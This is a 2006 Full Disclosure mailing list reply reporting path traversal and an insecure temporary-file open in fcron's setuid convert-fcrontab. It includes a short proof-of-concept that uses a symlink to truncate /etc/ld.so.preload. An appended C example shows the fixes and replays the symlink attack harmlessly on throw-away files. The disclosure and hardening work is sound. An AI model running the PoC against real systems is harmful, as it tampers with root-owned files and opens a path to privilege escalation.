Full Disclosure mailing list archives
Re: Fcrontab - memory corruption on heap.
From: Karol Wiesek <appelast () drumnbass art pl>
Date: Thu, 2 Feb 2006 20:08:26 +0100
On Wed, Feb 01, 2006 at 03:28:50PM +0100, Adam Zabrocki wrote:
=> Name: Fcron - convert-fcrontab
=> Vendor URL: http://fcron.free.fr
=> Author: Adam Zabrocki <pi3ki31ny () wp pl>
=> Date: November 25, 2005
=>
=> Issue:
=>
=> Fcron (convert-fcrontab) allows users to cause corruption on the heap section.

Hi pi3 and list,

There are much simpler bugs in convert-fcrontab, which together allow one to gain uid 0 privileges.

* convert-fcrontab lacks any checks on the file path passed to it. An attacker could get outside of the fcron spool directory using "../".

* convert-fcrontab opens its temporary file without the O_EXCL flag.

PoC:

perl -e '{print "fcrontab-017\nuser\x001132863099\n\x00\x00\x00\x00"}' > /tmp/fc_file
ln -s /etc/ld.so.preload /tmp/fc_file.tmp
convert-fcrontab ../../../../tmp/fc_file

This will create an empty /etc/ld.so.preload file or truncate an existing one.

Tested on fcron 2.9.5 shipped with Trustix 2.2 (setuid root by default), and fcron 3.0.0.

regards
Karol

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
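The two bugs Karol's PoC chains, and the two fixes they imply, can be shown side by side in a few lines of C. The following is an added example written for this archive page; it is neither fcron's code nor code from either post. It assumes a spool directory of /var/spool/fcron and the function names build_spool_path, spool_path_for, open_tmp_unsafe, open_tmp_exclusive and demo_symlink_race, none of which exist in fcron. The first part restricts the argument to a bare file name inside the spool directory, which removes the "../" traversal; the second part contrasts the create-or-truncate open without O_EXCL (the pattern that follows a planted symlink and truncates its target) with an O_EXCL|O_NOFOLLOW open that refuses it. demo_symlink_race() replays the ln -s trick with throw-away files in a directory of your choosing instead of /etc/ld.so.preload.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#ifndef O_NOFOLLOW
#define O_NOFOLLOW 0   /* O_EXCL alone already refuses an existing symlink on POSIX */
#endif

/* Assumed spool directory; fcron's real location is build-dependent. */
#define SPOOL_DIR "/var/spool/fcron"

/* Accept only a bare file name inside the spool directory. Rejecting any '/'
 * kills "../" traversal and absolute paths; "." and ".." are rejected as
 * names. Returns 1 and fills out on success, 0 otherwise. */
int build_spool_path(const char *spool, const char *name, char *out, size_t outlen)
{
    if (name == NULL || *name == '\0')
        return 0;
    if (strchr(name, '/') != NULL)
        return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    int n = snprintf(out, outlen, "%s/%s", spool, name);
    return (n > 0 && (size_t)n < outlen) ? 1 : 0;
}

/* Convenience wrapper: the validated path in a static buffer, or NULL. */
const char *spool_path_for(const char *name)
{
    static char buf[4096];
    return build_spool_path(SPOOL_DIR, name, buf, sizeof buf) ? buf : NULL;
}

/* The pattern the post describes: create-or-truncate without O_EXCL. If a
 * symlink has been planted at path, this follows it and truncates the target
 * (e.g. /etc/ld.so.preload when the binary runs setuid root). */
int open_tmp_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened form: O_EXCL makes creation atomic and fails with EEXIST when
 * anything, a symlink included, already exists at path; O_NOFOLLOW is an
 * extra guard against following a link. */
int open_tmp_exclusive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Replay the symlink trick inside dir with throw-away files.
 * Returns -1 if the scenario could not be set up, otherwise a bitmask:
 *   bit 0: open_tmp_exclusive() refused the planted symlink
 *   bit 1: open_tmp_unsafe() followed it and truncated the victim file
 * so 3 is the expected result on a POSIX system. */
int demo_symlink_race(const char *dir)
{
    char victim[512], link[512];
    struct stat st;
    int fd, result = 0;

    snprintf(victim, sizeof victim, "%s/victim.%ld", dir, (long)getpid());
    snprintf(link, sizeof link, "%s/fc_file.tmp.%ld", dir, (long)getpid());
    unlink(link);
    unlink(victim);

    /* Victim file with content, standing in for an existing /etc/ld.so.preload. */
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    if (write(fd, "keep me\n", 8) != 8) {
        close(fd);
        unlink(victim);
        return -1;
    }
    close(fd);

    /* Attacker step, the equivalent of: ln -s victim fc_file.tmp */
    if (symlink(victim, link) != 0) {
        unlink(victim);
        return -1;
    }

    fd = open_tmp_exclusive(link);
    if (fd < 0 && (errno == EEXIST || errno == ELOOP))
        result |= 1;
    if (fd >= 0)
        close(fd);

    fd = open_tmp_unsafe(link);
    if (fd >= 0)
        close(fd);
    if (stat(victim, &st) == 0 && st.st_size == 0)
        result |= 2;

    unlink(link);
    unlink(victim);
    return result;
}

int main(void)
{
    const char *ok = spool_path_for("user");
    printf("user                    -> %s\n", ok ? ok : "rejected");
    printf("../../../../tmp/fc_file -> %s\n",
           spool_path_for("../../../../tmp/fc_file") ? "accepted" : "rejected");
    printf("symlink demo in cwd     -> %d (3 = exclusive open refused, unsafe open truncated)\n",
           demo_symlink_race("."));
    return 0;
}
```

Run it from any writable directory; the demo leaves nothing behind. The path check deliberately refuses every '/' rather than trying to canonicalise "../" sequences, since a setuid tool that only ever needs a file name in its own spool has no reason to accept anything else.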
Current thread:
- Fcrontab - memory corruption on heap. Adam Zabrocki (Feb 01)
- Re: Fcrontab - memory corruption on heap. Karol Wiesek (Feb 02)